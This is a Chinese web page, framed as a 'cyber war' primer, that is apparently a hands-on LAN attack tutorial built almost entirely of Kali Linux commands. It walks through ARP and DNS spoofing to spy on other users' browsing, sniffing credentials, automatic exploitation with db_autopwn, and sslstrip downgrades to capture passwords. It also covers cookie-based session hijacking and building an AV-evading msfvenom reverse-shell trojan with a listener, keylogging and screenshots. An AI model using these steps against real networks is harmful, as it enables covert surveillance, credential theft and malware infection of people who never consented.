打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
浅谈渗透在网战中的应用办法

前言:中美网战打响的那一刹那,中国已经落后很多年。然而,我们一直没有停止学习的脚步,“师夷长技以制夷”——我们一直奋斗在战争的第一线。经过漫长的沉淀,原来你就在身边不远处。

此处省略1000字,看下面的实操。
1
1、获取内网目标机的浏览图片
工具:arpspoof、driftnet
① 开启Kali的数据转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 对目标机进行Arp欺骗:
arpspoof -i eth0 -t 192.168.0.254 192.168.0.71
③ 打开driftnet进行抓包(实验截图如下)

 

2
偷窥内网用户浏览过的网页日志
工具:Ettercap、urlsnarf、driftnet
① 开启数据转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 打开Ettercap并设置好网卡和攻击目标;
ettercap -G // 启动Ettercap图形界面
③ 打开urlsnarf开始抓取监听到的url并显示;
urlsnarf -i eth0
④ 同时也可以打开driftnet抓取图片。
driftnet -i eth0


 

3
嗅探内网中的敏感信息
工具:metasploit 的嗅探模块 auxiliary/sniffer/psnuffle
注:
① 实测中得到的数据均是本地机和本机各个虚拟机(桥接)的数据,可能跟虚拟机环境有关,猜想在真实机运行应该可以捕获其它网内机器。
① 后经测试,psnuffle模块应该只是捕获经过本地网卡的数据,需要结合arp欺骗方能达到很好的效果。实测中,我在嗅探时,同时打开了Cain进行arp欺骗,捕获效果非常好。
② 使用ichunqiu和网易登录,并未抓到POST数据包,全是GET的;不过FTP可以成功获取。

 

4
DNS欺骗
工具:Ettercap
① 编辑etter.dns文件,加入条目,将进行目标网站重定向;
vim /etc/ettercap/etter.dns // 编辑文件
*.xueshen.com A 192.168.0.81 // 加入域名定向
② 开启dns欺骗:
ettercap -T -q -P dns_spoof -M arp // //
注:如果报错“Incorrect number of token (///) in TARGET !!”,可将“//”换为“///”即可。

 

5
Metasploit自动攻击
工具:Metasploit
① 进入msfconsole,连接数据库:
db_connect postgres:toor@127.0.0.1/msf
② 扫描ip段,扫描结果会自动写入数据库:
db_nmap -sS -Pn 192.168.0.1/24
③ 加载db_autopwn插件并执行自动攻击:
load db_autopwn // 加载插件
db_autopwn -t -p -r -e // 根据扫描到的ip的端口情况自动选择模块进行攻击测试

 

注:实际过程中可能会遇到以下错误。

5.1 kali2.0中msf连接postgres数据库错误


错误描述:

msf> db_status

postgres selected, no connection

解决办法:

service postgres start

msfdb init

执行命令后,重启msf便会自动连接到数据库。

5.2 无法执行db_autopwn错误


错误描述

msf > db_autopwn -t -p -r -e

[-] The db_autopwn command is DEPRECATED

[-] See http://r-7.co/xY65Zr instead

解决办法:

到GitHub上下载该插件,并放到/usr/share/metasploit-framework/plugins目录下即可。

下载地址:

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

6
利用msfvenom生成木马
工具:metasploit
① 生成反弹木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.81 LPORT=5555 -f exe -o /tmp/muma.exe
免杀:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ’\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
② 打开msfconsole进行端口监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.81
set LPORT 5555
exploit
③ 当目标机运行muma.exe后便可得到Shell。
screenshot // 截屏
keyscan_start>keyscan_dump>keyscan_stop // 键盘记录

 

 

7
HTTP&HTTPS账号密码获取
工具:arpspoof、ettercap、sslstrip
① 开启数据转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 开启Arp欺骗:
arpspoof -i eth0 -t 192.168.0.78 192.168.0.254
③ 编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);
vim /etc/ettercap/etter.conf
# if you use iptables:
redir_command_on = 'iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport'
redir_command_off = 'iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport'
sslstrip -a -f -k // 将HTTPS还原为HTTP
缺点:容易出现证书错误
④ 开始抓包:
ettercap -Tq -i eth0
注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。

 

8
会话劫持
方法一

工具:arpspoof、wireshark、ferret、hamster

① 开启数据转发:

echo 1 >/proc/sys/net/ipv4/ip_forward

② 开启arp欺骗:

arpspoof -i eth0 -t 192.168.0.71 192.168.0.254

③ 开启wireshark进行抓包,抓包后需要导出为pcap文件;

④ 使用ferret解析文件,生成hasmter.txt文件:

ferret -r cookie.pcap

⑤ 打开hamster软件,然后将浏览器的代理设置为 127.0.0.1:1234;

⑥ 在浏览器中访问 http://127.0.0.1:1234 ,在页面中点击抓到的网页链接获得会话。


 

方法二

工具:ferret、hamster

① 开启ferret抓包:

ferret -i eth0

② 开启hamster:

hamster

③ 打开浏览器并设置好代理,然后访问http://127.0.0.1:1234,在页面中选择网卡可实时查看抓取到的会话。

 

方法三

工具:Cookie Cadger

① 打开软件并设置好网卡,然后开启抓包;

java -jar CookieCadger.jar

② 当局域网内有人上网涉及敏感信息,软件就会抓到数据包并罗列出来,只需点选某个网址,加载网站Cookies(Load Domain Cookies)即可实现会话劫持。

注:

① 实测中点击加载cookies后,软件一直“Loading request into browser,please wait...”,使用浏览器浏览也没有劫持到。

② 虽然是java编写的软件,但是在Win10下没找到网卡,无法使用。

Q

8.1 安装ferret时提示“E: 无法定位软件包 ferret”

解决办法:

① 设置更新源:

vim /etc/apt/sources.list // 打开更新源配置文件

deb http://http.kali.org/kali kali-rolling main non-free contrib

② 更新全部软件包:

apt-get update && apt-get dist-upgrade

③ 安装ferret:

apt-get install ferret-sidejack // 注意软件名是ferret-sidejack不是ferret,ferret是别的软件

注:有可能需要添加对32位的支持dpkg --add-architecture i386

Q

8.2 获取Cookie Cadger

最新版本的Kali已经移除了Cookie Cadger,可使用以下命令获取并安装



wget https://www.cookiecadger.com/files/CookieCadger-1.08.jar
chmod +x CookieCadger-1.08.jar
mv CookieCadger-1.08.jar /usr/bin/


长按下方赞赏给予鼓励

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
内网arp攻击
小心公共wifi(kali linux下的无线攻击技术)
Kali Linux Web 渗透测试视频教程—第十四课
局域网安全为何如此不堪:演习一次内网攻击 | 高蛋白网
如何劫持软件更新来安装 Rootkit 的后门访问
10大常用渗透测试工具
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服